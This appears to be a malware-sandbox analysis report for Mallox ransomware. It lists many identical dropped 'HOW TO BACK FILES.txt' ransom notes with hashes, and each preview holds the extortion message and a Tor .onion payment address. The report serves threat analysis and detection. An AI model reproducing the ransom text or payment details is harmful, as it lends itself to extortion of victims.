                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
